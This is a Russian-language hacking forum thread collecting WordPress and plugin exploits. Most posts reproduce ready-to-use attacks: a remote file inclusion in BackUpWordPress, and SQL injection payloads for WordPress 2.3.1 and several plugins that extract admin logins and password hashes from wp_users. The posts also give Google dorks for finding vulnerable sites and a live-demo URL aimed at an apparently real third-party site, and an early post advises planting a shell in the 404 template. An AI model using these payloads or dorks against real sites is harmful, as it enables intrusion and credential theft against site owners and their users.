HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.10.2019, 14:35
Rastamanka
Познающий
Регистрация: 27.11.2008
Сообщений: 86
С нами: 9186841

Репутация: 8
По умолчанию

Цитата:
Сообщение от jakonda1001  

нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?
Что за способ если не секрет?
 
Ответить с цитированием

  #2  
Старый 23.11.2019, 01:54
Goore
Новичок
Регистрация: 30.03.2010
Сообщений: 0
С нами: 8483942

Репутация: 0
По умолчанию

Privet, kto znaet kak izpolzuvats etot? https://wpvulndb.com/vulnerabilities/9955
 
Ответить с цитированием

  #3  
Старый 23.11.2019, 05:00
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

при наличии админки, шел льется в 404 ошибку, вернее в этот файл
 
Ответить с цитированием

  #4  
Старый 01.11.2007, 19:21
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию

WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

Код:
#Author: S.W.A.T.


#cont@ct: svvateam@yahoo.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"

Mirror:

http://www.milw0rm.com/exploits/4593
 
Ответить с цитированием

Sql Injection in wordpress 2.3.1
  #5  
Старый 05.12.2007, 21:23
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию Sql Injection in wordpress 2.3.1

Sql Injection in wordpress 2.3.1


Код:
Author : Beenu Arora

Mail : beenudel1986 (at) gmail (dot) com [email concealed]

Application : WordPress (2.3.1)

Homepage: http://wordpress.org/

~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : P

POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*

Код:
http://www.securityfocus.com/archive/1/484608
 
Ответить с цитированием

  #6  
Старый 15.02.2008, 22:14
FraiDex
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
С нами: 10475029

Репутация: 135
По умолчанию

Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability

example

Код:
http://xxxxx/forums?forum=xxxx&topic= (expliot)

EXPLOİT 1 :


Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*


EXPLOİT 2 :


Код:
SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)

example


Код:
www.xxxxx/forums?forum=1(expliot)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

example :

Код:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :

Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :

Код:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(с)milw0rm.com

Последний раз редактировалось FraiDex; 15.02.2008 в 22:19..
 
Ответить с цитированием

  #7  
Старый 17.02.2008, 03:26
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию

Wordpress Photo album Remote SQL Injection Vulnerability

EXAMPLE
Цитата:
http://xxxxxxxx/?page_id=13&album= [exploit]
Сплоит
Цитата:
user_name&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
зы
Цитата:
allinurl: page_id album "photo"
Auth S@BUN http://milw0rm.com/exploits/5135
 
Ответить с цитированием

  #8  
Старый 23.04.2008, 07:22
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию

Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability

SQL-Injection

Код:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
Dork:

inurl:/wp-content/plugins/wpSS/

Author : 1ten0.0net1
 
Ответить с цитированием

Сброс пароля через phpmyadmin
  #9  
Старый 27.04.2008, 08:31
gibson
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами: 10636106

Репутация: 705
По умолчанию Сброс пароля через phpmyadmin

только для версии <=2.3.x
Если вы случайно забыли пароль от админки), то можно сменить его через phpmyadmin. Подробнее.
http://cubegames.net/blog/2008/04/26/reset-wp-password-via-phpmyadmin/

запрос
Цитата:
UPDATE `wordpress`.`wp_users` SET `user_pass` = MD5('antichat') WHERE `wp_users`.`user_login` =`admin` LIMIT 1;
Этот метод может быть полезен если не сработало сбрасывание пасс на мыло.

http://trac.wordpress.org/ticket/6842

идет обрезание ключа почтавиками в частности gmail

версия 2.5.1 последняя на сегодняшний день.

Последний раз редактировалось Elekt; 01.05.2008 в 23:47..
 
Ответить с цитированием

WordPress Media Holder (id) Sql injetion vulnerability!
  #10  
Старый 30.10.2008, 18:45
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами: 9806786

Репутация: 869
По умолчанию WordPress Media Holder (id) Sql injetion vulnerability!

WordPress Media Holder (id) Sql injetion vulnerability!

Код:
-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site   :  www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork:         mediaHolder.php?id
-------------------------------------------------------------------
Exp:          http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit:      -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------


-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------

# milw0rm.com [2008-10-26]
Source:milw0rm
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.